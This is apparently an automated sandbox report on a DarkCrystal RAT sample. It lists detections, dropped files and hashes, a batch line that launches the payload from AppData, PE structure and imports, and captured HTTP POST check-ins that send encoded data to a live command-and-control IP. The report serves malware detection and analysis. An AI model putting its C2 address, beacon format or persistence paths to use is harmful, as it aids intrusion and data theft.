                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 78%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................>..........^\... ...`....@.. ....................................@..................................\..K....`..p............................................................................ ............... ..H............text...d<... ...>.................. ..`.rsrc...p....`.......@..............@....reloc...............D..............@..B................@\......H...........t.......g...h....z...[.......................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{l...9....& ....8........0.......... ........8........E....P.......|...........8K...~....(A... .... .... ....s....~....(E....... ....~....{....9....& ....8........~....(I...~....(M... ....?:... ....8k......... ....~....{....:Q...& ....8F...r...ps....z*~....:.... ....8&.....(....*
                                      Process:C:\Users\user\Desktop\7vP2IvNXqx.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):106
                                      Entropy (8bit):5.004878388983618
                                      Encrypted:false
                                      SSDEEP:3:NPIylf1hgueY/nHYypLsfXesHXqXL40xGA:NPdrReY/n7s3qbDl
                                      MD5:D589F058493EC831D1BF8557D8BF5BCE
                                      SHA1:23F75C8FA6F4BB7F193A19671F61B4F90BE6F3E7
                                      SHA-256:403A9ABF284F8E4A80522EA6D08ED5954D6AC7A9E791270BFFF73D491B207D63
                                      SHA-512:3271A5AF46C78FC10791DC0C28341AAFA92B39A56537B6C93C6C77CD4062A1B2C25C780306D3154A69BAB69C301C1FDEA81283DE1251397DBF4C999B8697017B
                                      Malicious:false
                                      Preview:%Qcm%%hcNfPXIJctz%..%taizPDEqRyxZ%"%AppData%\msProviderbrowserrefdll/winIntorefruntimebroker.exe"%itXasTc%
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):207
                                      Entropy (8bit):5.773584941669277
                                      Encrypted:false
                                      SSDEEP:6:3kh6aeXWjTEayH4uU6gohZRy/g6glxeC/p:UQXWjTd6bRy/2f9h
                                      MD5:C1AD9BA17CA7FAF3DB2818F906759E8E
                                      SHA1:1739BAE78F0D232DCA7E3C0006665373D9D3D437
                                      SHA-256:B971AF0D735103FFFBA9D75D400BE1BC7DB01F7BF395669A8E509769989BD3EA
                                      SHA-512:FA5457814DEF6BF12123908FFE6204DE2B5B5695EA192BBD83395C7BABC82534230EFCC490E80ABB187C3BFE3FC05307DD54A8876EECECD7D6F9F557908B5802
                                      Malicious:false
                                      Preview:Yud36a0Q7JukxUcNygIMi89QJ47hAjI650TZYhJrspVTBQeYXA1c3JoZvNuBdSQYAxp6BCyRXbe2nqO2aiK9rqDvM3oLwHNZZ7SOkhWULkFbowwF82l4IQrUt4uHXnePOFcqX9S2LzxGllGaHjM4fTRIQ8eqwO7iGzNjTFr9ktsScksIxUAybju4yUaZelF62P9vXhGB1MUwk8p
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1656320
                                      Entropy (8bit):7.420770523484582
                                      Encrypted:false
                                      SSDEEP:24576:7nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQoYyx8MU:7TAjRK61bGW2djTuBkLIX8
                                      MD5:07A0FB75F52C87371C88F48AE80AFA1B
                                      SHA1:A2184C8F4C5A1B81A1E8BF426DB05EAC504A66A0
                                      SHA-256:51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
                                      SHA-512:0322117985791E69BA8E985659B7F91FCCA76809C998C9AE4AF5FCD98B2D757E8E18960FBE3C6D9C9AC306E5F01A78D7E70E950D3B77A80ABA1698C5B69C75CB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 78%
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):190
                                      Entropy (8bit):5.669308538034561
                                      Encrypted:false
                                      SSDEEP:3:JQLMtEIWHRSXBgwqNwTe3mcTADNPTyiBgTc6jS2ofKiTRZEDVcZynUkj7hwGsXn:JrtE3Hgmw2wTe39ARPxBC2fhTRZEpOyw
                                      MD5:F34814448AFDCD674A08B5069A84F8C1
                                      SHA1:C1A40E6D28A1C4DAD78773BAC84FD29746569E85
                                      SHA-256:61B9307F1A5836FBA488C5B706244AB58BA53A47C7F07032C0DFB7D29A845A64
                                      SHA-512:A375AA45C7020A49FFE21CC7352F68788746613C944F6E80066F21253EAD4A18BFE6BEEEF7BD580140095334C97093E06383F9DCDBD211BA7F721F1A864A8403
                                      Malicious:false
                                      Preview:oS6z5nfAdWH7oz1486UKsyAr3SKy3p9hdfXYIEEUOhU6xyVWMCAp4bc0SP5ncqGxXkeIbdv41A6LdE3E6yl0oUmBChF3Ib1hbgjNUM4sRGy4fRWOW1qoFPIC7cG4X2vaIYt6fpuu42iigsgvK1gRuNcLXgQ1G9UZUXvGhZtqG6tMrkgO6UugVeq56ij8Z2
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1656320
                                      Entropy (8bit):7.420770523484582
                                      Encrypted:false
                                      SSDEEP:24576:7nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQoYyx8MU:7TAjRK61bGW2djTuBkLIX8
                                      MD5:07A0FB75F52C87371C88F48AE80AFA1B
                                      SHA1:A2184C8F4C5A1B81A1E8BF426DB05EAC504A66A0
                                      SHA-256:51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
                                      SHA-512:0322117985791E69BA8E985659B7F91FCCA76809C998C9AE4AF5FCD98B2D757E8E18960FBE3C6D9C9AC306E5F01A78D7E70E950D3B77A80ABA1698C5B69C75CB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 78%
                                      Process:C:\Windows\System32\w32tm.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):151
                                      Entropy (8bit):4.757812247066604
                                      Encrypted:false
                                      SSDEEP:3:VLV993J+miJWEoJ8FXrX9QuL1XVWVVfXV0X6vo5V1XQNvj:Vx993DEUQtBJs1uXFL1Ax
                                      MD5:45D0BEB9E43D5C6134AF4AFEE9240B5C
                                      SHA1:F0BAE8D5E9AD333B413A26E6AC36FA893B3CA8EA
                                      SHA-256:51F1925534FF477FC3F09AD8A483121638354DB2261979C9FC726E8BECDBB560
                                      SHA-512:0B0C1698DE8A666FFBB6AA877D1065D322C6E7553E44827EF549C562DC6C0513B4AEE660C30B72E5FDCA982F65E7B2959BB84529661499A53684497364714EE7
                                      Malicious:false
                                      Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 03/01/2025 14:00:20..14:00:20, error: 0x80072746.14:00:25, error: 0x80072746.
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.3662428781202385
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:7vP2IvNXqx.exe
                                      File size:1'978'248 bytes
                                      MD5:1a3a764c4b4974435dba8926e7137766
                                      SHA1:7cf7f1525fc7deb3d8523ac550a3787765ce6742
                                      SHA256:2028b4c9f540e5d74ce2ad0f9a443badc827f1f70af23dfd01455747e564b1a2
                                      SHA512:4923168584d0a34151fbbee0c07e6700ec6de424af708f52ff4aaf329b6186e304e3a0aa18b5c1c01e1e83f75f18a41ac4319ddbaf7df19c03472962e3b03b63
                                      SSDEEP:24576:2TbBv5rUyXV/nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQ+:IBJ/TAjRK61bGW2djTuBkLIX8M
                                      TLSH:7C959E0AA6965E32D2653F3285FB041D83B0D6637653DF4B3A5F65E3A8153708B232F2
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                      Icon Hash:1515d4d4442f2d2d
                                      Entrypoint:0x41f530
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                      Instruction
                                      call 00007F0A14D0EB7Bh
                                      jmp 00007F0A14D0E48Dh
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      push dword ptr [ebp+08h]
                                      mov esi, ecx
                                      call 00007F0A14D012D7h
                                      mov dword ptr [esi], 004356D0h
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      and dword ptr [ecx+04h], 00000000h
                                      mov eax, ecx
                                      and dword ptr [ecx+08h], 00000000h
                                      mov dword ptr [ecx+04h], 004356D8h
                                      mov dword ptr [ecx], 004356D0h
                                      ret
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      mov esi, ecx
                                      lea eax, dword ptr [esi+04h]
                                      mov dword ptr [esi], 004356B8h
                                      push eax
                                      call 00007F0A14D1191Fh
                                      Programming Language:
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-03T18:32:05.218406+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49730 | 206.188.197.24 | 80 | TCP
2025-01-03T18:32:16.780963+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49737 | 206.188.197.24 | 80 | TCP
2025-01-03T18:32:23.515197+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49738 | 206.188.197.24 | 80 | TCP
2025-01-03T18:32:30.124537+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49739 | 206.188.197.24 | 80 | TCP
2025-01-03T18:32:36.765117+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49740 | 206.188.197.24 | 80 | TCP
2025-01-03T18:32:47.468862+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49741 | 206.188.197.24 | 80 | TCP
2025-01-03T18:32:54.686916+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49743 | 206.188.197.24 | 80 | TCP
2025-01-03T18:33:01.280651+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49780 | 206.188.197.24 | 80 | TCP
2025-01-03T18:33:08.764962+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49827 | 206.188.197.24 | 80 | TCP
2025-01-03T18:33:15.561834+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49868 | 206.188.197.24 | 80 | TCP
2025-01-03T18:33:22.155558+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49907 | 206.188.197.24 | 80 | TCP
2025-01-03T18:33:28.718020+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49945 | 206.188.197.24 | 80 | TCP
2025-01-03T18:33:39.030477+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 50010 | 206.188.197.24 | 80 | TCP
2025-01-03T18:33:45.218167+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 50015 | 206.188.197.24 | 80 | TCP
2025-01-03T18:33:55.796071+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 50016 | 206.188.197.24 | 80 | TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      • 206.188.197.24
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 206.188.197.24 | 80 | 7652 | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 18:32:04.541862011 CET | 355 | OUT | POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
Jan 3, 2025 18:32:04.891035080 CET | 344 | OUT | Data Raw: 05 00 01 02 06 00 01 03 05 06 02 01 02 0d 01 04 00 0a 05 08 02 03 03 0a 07 06 0d 01 06 0f 03 02 0a 02 06 5b 07 05 07 03 0c 00 04 53 05 56 04 56 04 51 0b 01 0d 53 04 05 07 04 06 00 04 52 06 00 02 57 0f 59 07 00 07 01 0e 02 0c 54 0d 01 0d 09 07 51
                                      Data Ascii: [SVVQSRWYTQQP\L~h`zNcrn^vwQ~f^wt|]lxo{Y~|mhtt~_~V@{C\A~Ly
Jan 3, 2025 18:32:05.165966988 CET | 326 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:32:05 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 206.188.197.24 | 80 | 7952 | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 18:32:16.130064964 CET | 390 | OUT | POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
Jan 3, 2025 18:32:16.484189034 CET | 344 | OUT | Data Raw: 00 05 04 03 06 09 01 07 05 06 02 01 02 03 01 0a 00 00 05 08 02 02 03 0e 02 05 0f 02 07 06 02 07 0a 02 06 5d 00 01 07 52 0b 02 04 07 07 05 02 04 05 05 0f 09 0d 57 04 02 01 00 04 04 04 02 05 0e 03 07 0e 0e 05 03 04 04 0c 00 0b 06 0d 50 0e 05 05 06
                                      Data Ascii: ]RWP[WSV\L~N|pPM`\z]u[h|o~^vo`LhcQXxlclvK~hAvwx}O~V@zmzA~\i
                                      Jan 3, 2025 18:32:16.733911991 CET | 728 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:32:16 GMT
                                      Content-Type: text/html
                                      Content-Length: 564
                                      Connection: keep-alive
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      2 | 192.168.2.4 | 49738 | 206.188.197.24 | 80 | 2284 | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jan 3, 2025 18:32:22.846575022 CET | 355 | OUT | POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:32:23.203473091 CET | 344 | OUT | Data Raw: 05 00 04 07 03 0a 04 01 05 06 02 01 02 07 01 06 00 03 05 0b 02 01 03 01 00 52 0a 02 04 04 01 52 0d 54 07 0a 01 07 04 04 0e 51 07 00 00 07 05 05 03 03 0c 5b 0e 00 06 0a 05 01 05 0c 06 56 05 0f 00 0a 0d 5b 05 01 06 02 0d 06 0e 50 0d 04 0c 05 05 51
                                      Data Ascii: RRTQ[V[PQU]\L~N^vtbrYuukSUz]clkYptIoolYxNrkTkSwgU\}u~V@A{mvL~b[
                                      Jan 3, 2025 18:32:23.469327927 CET | 326 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.24.0 (Ubuntu)
                                      Date: Fri, 03 Jan 2025 17:32:23 GMT
                                      Content-Type: text/html
                                      Content-Length: 162
                                      Connection: keep-alive
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      3 | 192.168.2.4 | 49739 | 206.188.197.24 | 80 | 5796 | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jan 3, 2025 18:32:29.449120998 CET | 355 | OUT | POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1
                                      Content-Type: application/octet-stream
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                      Host: 206.188.197.24
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Jan 3, 2025 18:32:29.796830893 CET | 344 | OUT | Data Raw: 05 01 04 0d 03 0d 04 05 05 06 02 01 02 03 01 05 00 0b 05 09 02 04 03 0e 00 0f 0f 02 04 54 00 00 0e 04 06 0e 00 57 07 05 0c 54 04 02 05 04 04 03 05 0a 0d 09 0f 01 06 00 05 0f 06 54 07 0a 07 58 02 04 0e 0a 04 0e 04 08 0c 05 0f 05 0d 54 0b 04 06 04
